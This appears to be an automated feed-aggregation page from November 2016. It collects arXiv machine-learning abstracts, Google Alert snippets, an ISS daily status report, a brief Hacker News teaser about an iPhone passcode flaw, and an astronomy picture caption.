Learning to reinforcement learn. (arXiv:1611.05763v1 [cs.LG])

In recent years deep reinforcement learning (RL) systems have attained superhuman performance in a number of challenging task domains. However, a major limitation of such applications is their demand for massive amounts of training data. A critical present objective is thus to develop deep RL methods that can adapt rapidly to new tasks. In the present work we introduce a novel approach to this challenge, which we refer to as deep meta-reinforcement learning. Previous work has shown that recurrent networks can support meta-learning in a fully supervised context. We extend this approach to the RL setting. What emerges is a system that is trained using one RL algorithm, but whose recurrent dynamics implement a second, quite separate RL procedure. This second, learned RL algorithm can differ from the original one in arbitrary ways. Importantly, because it is learned, it is configured to exploit structure in the training domain. We unpack these points in a series of seven proof-of-concept experiments, each of which examines a key aspect of deep meta-RL. We consider prospects for extending and scaling up the approach, and also point out some potentially important implications for neuroscience.



from cs.AI updates on arXiv.org http://ift.tt/2fmkPSB
via IFTTT

Nothing Else Matters: Model-Agnostic Explanations By Identifying Prediction Invariance. (arXiv:1611.05817v1 [stat.ML])

At the core of interpretable machine learning is the question of whether humans are able to make accurate predictions about a model's behavior. Assumed in this question are three properties of the interpretable output: coverage, precision, and effort. Coverage refers to how often humans think they can predict the model's behavior, precision to how accurate humans are in those predictions, and effort is either the up-front effort required in interpreting the model, or the effort required to make predictions about a model's behavior.

In this work, we propose anchor-LIME (aLIME), a model-agnostic technique that produces high-precision rule-based explanations for which the coverage boundaries are very clear. We compare aLIME to linear LIME with simulated experiments, and demonstrate the flexibility of aLIME with qualitative examples from a variety of domains and tasks.



from cs.AI updates on arXiv.org http://ift.tt/2eLJsME
via IFTTT

Designing and Training Feedforward Neural Networks: A Smooth Optimisation Perspective. (arXiv:1611.05827v1 [cs.LG])

Despite the recent great success of deep neural networks in various applications, designing and training a deep neural network is still among the greatest challenges in the field. In this work, we present a smooth optimisation perspective on designing and training multilayer Feedforward Neural Networks (FNNs) in the supervised learning setting. By characterising the critical point conditions of an FNN based optimisation problem, we identify the conditions to eliminate local optima of the corresponding cost function. Moreover, by studying the Hessian structure of the cost function at the global minima, we develop an approximate Newton FNN algorithm, which is capable of alleviating the vanishing gradient problem. Finally, our results are numerically verified on two classic benchmarks, i.e., the XOR problem and the four region classification problem.



from cs.AI updates on arXiv.org http://ift.tt/2g0KznG
via IFTTT

Predicting Clinical Events by Combining Static and Dynamic Information Using Recurrent Neural Networks. (arXiv:1602.02685v2 [cs.LG] UPDATED)

In clinical data sets we often find static information (e.g. patient gender, blood type, etc.) combined with sequences of data that are recorded during multiple hospital visits (e.g. medications prescribed, tests performed, etc.). Recurrent Neural Networks (RNNs) have proven to be very successful for modelling sequences of data in many areas of Machine Learning. In this work we present an approach based on RNNs, specifically designed for the clinical domain, that combines static and dynamic information in order to predict future events. We work with a database collected in the Charit\'{e} Hospital in Berlin that contains complete information concerning patients that underwent a kidney transplantation. After the transplantation three main endpoints can occur: rejection of the kidney, loss of the kidney and death of the patient. Our goal is to predict, based on information recorded in the Electronic Health Record of each patient, whether any of those endpoints will occur within the next six or twelve months after each visit to the clinic. We compared different types of RNNs that we developed for this work, with a model based on a Feedforward Neural Network and a Logistic Regression model. We found that the RNN that we developed based on Gated Recurrent Units provides the best performance for this task. We also used the same models for a second task, i.e., next event prediction, and found that here the model based on a Feedforward Neural Network outperformed the other models. Our hypothesis is that long-term dependencies are not as relevant in this task.



from cs.AI updates on arXiv.org http://ift.tt/1ScrW0p
via IFTTT

Finite LTL Synthesis is EXPTIME-complete. (arXiv:1609.04371v2 [cs.LO] UPDATED)

LTL synthesis -- the construction of a function to satisfy a logical specification formulated in Linear Temporal Logic -- is a 2EXPTIME-complete problem with relevant applications in controller synthesis and a myriad of artificial intelligence applications. In this research note we consider De Giacomo and Vardi's variant of the synthesis problem for LTL formulas interpreted over finite rather than infinite traces. Rather surprisingly, given the existing claims on complexity, we establish that LTL synthesis is EXPTIME-complete for the finite interpretation, and not 2EXPTIME-complete as previously reported. Our result coincides nicely with the planning perspective where non-deterministic planning with full observability is EXPTIME-complete and partial observability increases the complexity to 2EXPTIME-complete; a recent related result for LTL synthesis shows that in the finite case with partial observability, the problem is 2EXPTIME-complete.



from cs.AI updates on arXiv.org http://ift.tt/2cJtPEw
via IFTTT

Universal adversarial perturbations. (arXiv:1610.08401v2 [cs.CV] UPDATED)

Given a state-of-the-art deep neural network classifier, we show the existence of a universal (image-agnostic) and very small perturbation vector that causes natural images to be misclassified with high probability. We propose a systematic algorithm for computing universal perturbations, and show that state-of-the-art deep neural networks are highly vulnerable to such perturbations, albeit being quasi-imperceptible to the human eye. We further empirically analyze these universal perturbations and show, in particular, that they generalize very well across neural networks. The surprising existence of universal perturbations reveals important geometric correlations among the high-dimensional decision boundary of classifiers. It further outlines potential security breaches with the existence of single directions in the input space that adversaries can possibly exploit to break a classifier on most natural images.



from cs.AI updates on arXiv.org http://ift.tt/2eHr3Q8
via IFTTT

Edward: A library for probabilistic modeling, inference, and criticism. (arXiv:1610.09787v2 [stat.CO] UPDATED)

Probabilistic modeling is a powerful approach for analyzing empirical information. We describe Edward, a library for probabilistic modeling. Edward's design reflects an iterative process pioneered by George Box: build a model of a phenomenon, make inferences about the model given data, and criticize the model's fit to the data. Edward supports a broad class of probabilistic models, efficient algorithms for inference, and many techniques for model criticism. The library builds on top of TensorFlow to support distributed training and hardware such as GPUs. Edward enables the development of complex probabilistic models and their algorithms at a massive scale.



from cs.AI updates on arXiv.org http://ift.tt/2fb93u5
via IFTTT

A Way out of the Odyssey: Analyzing and Combining Recent Insights for LSTMs. (arXiv:1611.05104v1 [cs.CL])

LSTMs have become a basic building block for many deep NLP models. In recent years, many improvements and variations have been proposed for deep sequence models in general, and LSTMs in particular. We propose and analyze a series of architectural modifications for LSTM networks resulting in improved performance for text classification datasets. We observe compounding improvements on traditional LSTMs using Monte Carlo test-time model averaging, deep vector averaging (DVA), and residual connections, along with four other suggested modifications. Our analysis provides a simple, reliable, and high quality baseline model.



from cs.AI updates on arXiv.org http://ift.tt/2g0jClG
via IFTTT

Sonya Clark Receives Anonymous Was a Woman Prize

Anonymous Was a Woman honors women artists over 40 who are at a critical moment in their lives or careers. Named after a line in a Virginia Woolf ...

from Google Alert - anonymous http://ift.tt/2glBMkr
via IFTTT

Ravens Video: Terrell Suggs reveals meaning behind Hacksaw Smithers, the alias he used on Dak Prescott conference call (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Disable rate content for anonymous users

I checked "Use Fivestar to rate content" for all roles except anonymous role. However, i can still vote if I am not logged in. Also, I get an AJAX Error ...

from Google Alert - anonymous http://ift.tt/2fALP43
via IFTTT

User mail token PHP notices for anonymous

... where you have full user accounts and anonymous user accounts. If the token is accessed for an anonymous user then a PHP notice is triggered:

from Google Alert - anonymous http://ift.tt/2fJ4SH4
via IFTTT

ISS Daily Summary Report – 11/16/2016

Human Research Facility (HRF) Software Upgrades: Today the crew initiated the second day of HRF software transitions.  Today’s upgrades will be to the HRF Personal Computer-3 (HRFPC-3).  Based on the compatibility issue observed during the HRF Rack 1 PC upgrade yesterday, ground teams were able to command to the HRF PC without needing to access the Rack Interface Controller (RIC). The new software loads will support new experiments and on-board capabilities.  Over the next two days, the HRF Rack 2 PC and HRFPC3 will be updated as well.  The HRF Racks provide an on-orbit laboratory that enables scientists conducting human life science research to evaluate the physiological, behavioral, and chemical changes induced by space flight. Research performed using the capabilities within the racks provide data to help scientists understand how the human body adapts to long-duration space flight.  Strata-1 Card Changeout: The crew completed a changeout of four Strata Secure Digital (SD) data cards and transferred photos to a Station Support Computer (SSC) for ground teams to downlink and distribute. Strata-1 investigates the properties and behavior of regolith on small, airless bodies. Regolith is the impact-shattered “soil” found on asteroids, comets, the Moon, and other airless worlds, but it is different from soil here on Earth in that it contains no living material. Strata-1’s goal is to give us answers about how regolith behaves and moves in microgravity, how easy or difficult it is to anchor a spacecraft in regolith, how it interacts with spacecraft and spacesuit materials, and other important properties. It is important to NASA to know how to set anchors in regolith, how to safely move and process large volumes of regolith, and predict and prevent risk to spacecraft and astronauts visiting these small bodies. Also, understanding the whole-body context of material returned to Earth from small asteroids, such as by the NASA OSIRIS-REx mission, the JAXA Hayabusa 1 and 2 missions, and the proposed NASA Asteroid Redirect Mission (ARM) is scientifically beneficial.  Cygnus Departure Preparations: Today, Robotics Ground Controllers maneuvered the Space Station Remote Manipulator System (SSRMS) and grappled Cygnus for release and departure scheduled for Monday, November 21st. The crew then performed an On Board Training (OBT) session to review release procedures. iPad Air 2 Deploy:  iPad Air 2 were deployed in the place of the current iPad 3s.  The iPad Air 2 will be used for everyday crew functions including viewing timelines, procedures and crew messages. These iPads have the ESA Everywear app and other crew preference apps including Microsoft Office Products (Word, Excel, PowerPoint). Two iPad 3s will remain onboard for several ongoing payload operations that are not able to update to the iPad Air 2s and one iPad 3 will continue to be used for the Wall Clock.  Oxygen Generation System (OGS) Hydrogen Orbital Replacement Unit (ORU) Quick Disconnect (QD) Inspection:  The crew accessed and inspected QD “DIW FROM RSA” on the OGS Hydrogen Dome. This QD was not able to be fully mated during last week’s Hydrogen ORU replacement and had to be secured with Kapton Tape. The QD was inspected for leaks as well as any movement out of position. No connections are demated or mated during this task. Crew reported no visible water in the rack or on or around the QD, and OGS was reactivated. Space Station Remote Manipulator System (SSRMS) Elbow Camera Failure: This morning, during operations to power SSRMS in preparation for grappling Cygnus, the tip elbow camera initialized with color bars. Multiple power cycle and reroute attempts have not been successful to recover the camera. This camera was providing clearance and alignment views which can be substituted with the SSRMS Base Elbow camera. Loss of the SSRMS Tip Elbow camera does not impact unberth and release operations for Cygnus.  Today’s Planned Activities All activities were completed unless otherwise noted. MORZE. Evaluation using SPRUT-2. Tagup with specialists FSL MPCC Laptop Powering On & Software Image Installation HRF1 PC 3 USB Load Installation Preparation Monitoring ИП-1 Air Flow Sensors ISS RS ППС-26, ППС-31 Plug-in Audit MORZE. Psycho-physiological Evaluation: Tsentrovka, SENSOR Tests Total Organic Carbon Analyzer (TOCA) Water Recovery System (WRS) Sample Analysis Water Recovery System Waste Water Tank Drain Termination Meteor Hard Drive Swapout MORZE. Psycho-physiological Evaluation: SUPOS Test MORZE. Psycho-physiological Evaluation: Cattell’s Test OTKLIK. Hardware Monitoring СОЖ maintenance BIMS. Operator Assistance During the Experiment BIMS. Experiment Tagup with specialists Onboard Training (OBT) Robotics On-board Trainer (ROBoT) Setup Total Organic Carbon Analyzer (TOCA) Sample Data Record iPad Air 2 Deploy iPad 3 Move Video Recording of Greetings On-board Training (OBT) Cygnus Robotics Onboard Trainer (ROBoT) Release ISS RS System Power Panels ППС-26 and ППС-31 Plug-in Audit MORZE. Psycho-physiological Evaluation: Strelau Test On-board Training (OBT) Cygnus Review MORZE. Closeout Ops Soyuz 732 Samsung Tablet Recharge, Initiate Oxygen Generation System Hydrogen Orbital Replacement Unit Quick Disconnect Inspection INTERACTION-2 Experiment Ops Regenerative Environmental Control and Life Support System (ECLSS) Recycle Tank Remove and Replace INTERACTION-2. Experiment Ops VEG-03 Plant Photo Soyuz 732 Samsung Tablet Recharge, Terminate Station Support Computer (SSC) 5 Reload Preparation Regenerative Environmental Control and Life Support System (RGN) Recycle Tank Fill CB/ISS CREW CONFERENCE HRF1 PC 3 USB Load Installation Conclude  Completed Task List Items None Ground Activities All activities were completed unless otherwise noted. SSRMS Cygnus Grapple JEMRMS Ground Control Handhold Exp Platform Sample View Three-Day Look Ahead: Thursday, 11/17: DoseTrack, STRATA Card, Cygnus Egress Friday, 11/18: Cygnus Vestibule Demate, Node 1 CPA Install, RWS Setup Saturday, 11/19: 49S Docking QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Operate Major Constituent Analyzer (MCA) Node 3 Idle Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/2eJIJvo
via IFTTT

Military police probe anonymous threat to Dutch airport

THE HAGUE, Netherlands (AP) - Military police have launched an investigation at a Dutch airport based on an anonymous threat. Police said in a ...

from Google Alert - anonymous http://ift.tt/2glLa8j
via IFTTT

New Hack: How to Bypass iPhone Passcode to Access Photos and Messages

Setting a passcode on your iPhone is the first line of defense to help prevent other people from accessing your personal details. However, it's pretty much easy for anyone with access to your iPhone to bypass the passcode protection (doesn't matter if you configured Touch ID or not) and access your personal photos and messages. A new critical security flaw discovered in iOS 8 and newer,


from The Hacker News http://ift.tt/2gkS3Hf
via IFTTT

The Heart and Soul Nebulas


Is the heart and soul of our Galaxy located in Cassiopeia? Possibly not, but that is where two bright emission nebulas nicknamed Heart and Soul can be found. The Heart Nebula, officially dubbed IC 1805 and visible in the featured image on the right, has a shape reminiscent of a classical heart symbol. Both nebulas shine brightly in the red light of energized hydrogen. Several young open clusters of stars populate the image and are visible here in blue, including the nebula centers. Light takes about 6,000 years to reach us from these nebulas, which together span roughly 300 light years. Studies of stars and clusters like those found in the Heart and Soul Nebulas have focused on how massive stars form and how they affect their environment. via NASA http://ift.tt/2fYA4mm

Wednesday, November 16, 2016

A São Sebastião (Anonymous)

Composer, Anonymous. Key, A major. Language, Portuguese. Piece Style, Early 20th century. Instrumentation, voice, organ ...

from Google Alert - anonymous http://ift.tt/2fHonj2
via IFTTT

I have a new follower on Twitter


Exiger
Global regulatory and financial crime, risk and compliance company. Our experts offer practical advice and cutting edge, technology-enabled solutions.
Americas, EMEA, APAC
https://t.co/PySOmXk8lo
Following: 87 - Followers: 289

November 16, 2016 at 09:55PM via Twitter http://twitter.com/ExigerLLC

Machine Learning Approach for Skill Evaluation in Robotic-Assisted Surgery. (arXiv:1611.05136v1 [cs.AI])

Evaluating surgeon skill has predominantly been a subjective task. Development of objective methods for surgical skill assessment are of increased interest. Recently, with technological advances such as robotic-assisted minimally invasive surgery (RMIS), new opportunities for objective and automated assessment frameworks have arisen. In this paper, we applied machine learning methods to automatically evaluate performance of the surgeon in RMIS. Six important movement features were used in the evaluation including completion time, path length, depth perception, speed, smoothness and curvature. Different classification methods applied to discriminate expert and novice surgeons. We test our method on real surgical data for suturing task and compare the classification result with the ground truth data (obtained by manual labeling). The experimental results show that the proposed framework can classify surgical skill level with relatively high accuracy of 85.7%. This study demonstrates the ability of machine learning methods to automatically classify expert and novice surgeons using movement features for different RMIS tasks. Due to the simplicity and generalizability of the introduced classification method, it is easy to implement in existing trainers.



from cs.AI updates on arXiv.org http://ift.tt/2eHN9mn
via IFTTT

The Effects of Relative Importance of User Constraints in Cloud of Things Resource Discovery: A Case Study. (arXiv:1611.05170v1 [cs.AI])

Over the last few years, the number of smart objects connected to the Internet has grown exponentially in comparison to the number of services and applications. The integration between Cloud Computing and Internet of Things, named as Cloud of Things, plays a key role in managing the connected things, their data and services. One of the main challenges in Cloud of Things is the resource discovery of the smart objects and their reuse in different contexts. Most of the existent work uses some kind of multi-criteria decision analysis algorithm to perform the resource discovery, but do not evaluate the impact that the user constraints has in the final solution. In this paper, we analyse the behaviour of the SAW, TOPSIS and VIKOR multi-objective decision analyses algorithms and the impact of user constraints on them. We evaluated the quality of the proposed solutions using the Pareto-optimality concept.



from cs.AI updates on arXiv.org http://ift.tt/2giyj5Z
via IFTTT